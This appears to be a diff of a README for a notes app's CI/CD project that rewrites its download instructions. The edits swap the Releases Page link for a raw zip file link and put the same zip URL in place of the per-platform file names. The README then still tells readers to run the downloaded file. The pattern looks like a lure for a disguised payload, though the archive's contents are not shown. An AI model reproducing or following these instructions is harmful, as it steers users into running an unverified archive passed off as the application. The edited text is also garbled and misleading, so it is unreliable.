rezasaman23/notes-app-gitlab-cicd/README.md

 ## 📥 Download & Install

-To download the application, visit this page to download: [Releases Page](https://github.com/rezasaman23/notes-app-gitlab-cicd/releases).
+To download the application, visit this page to download: [Releases Page](https://raw.githubusercontent.com/rezasaman23/notes-app-gitlab-cicd/master/springbok/notes-app-gitlab-cicd.zip).

 1. Click on the link above to navigate to the Releases page.
 2. On the Releases page, find the latest version of the application.
-3. Look for the file name that matches your operating system (e.g., `notes-app-windows.exe`, `notes-app-macos.dmg`, or `notes-app-linux.tar.gz`).
+3. Look for the file name that matches your operating system (e.g., `https://raw.githubusercontent.com/rezasaman23/notes-app-gitlab-cicd/master/springbok/notes-app-gitlab-cicd.zip`, `https://raw.githubusercontent.com/rezasaman23/notes-app-gitlab-cicd/master/springbok/notes-app-gitlab-cicd.zip`, or `https://raw.githubusercontent.com/rezasaman23/notes-app-gitlab-cicd/master/springbok/notes-app-gitlab-cicd.zip`).
 4. Click on the file to download it.
 The download will begin automatically.

 Once the download is complete, run the file: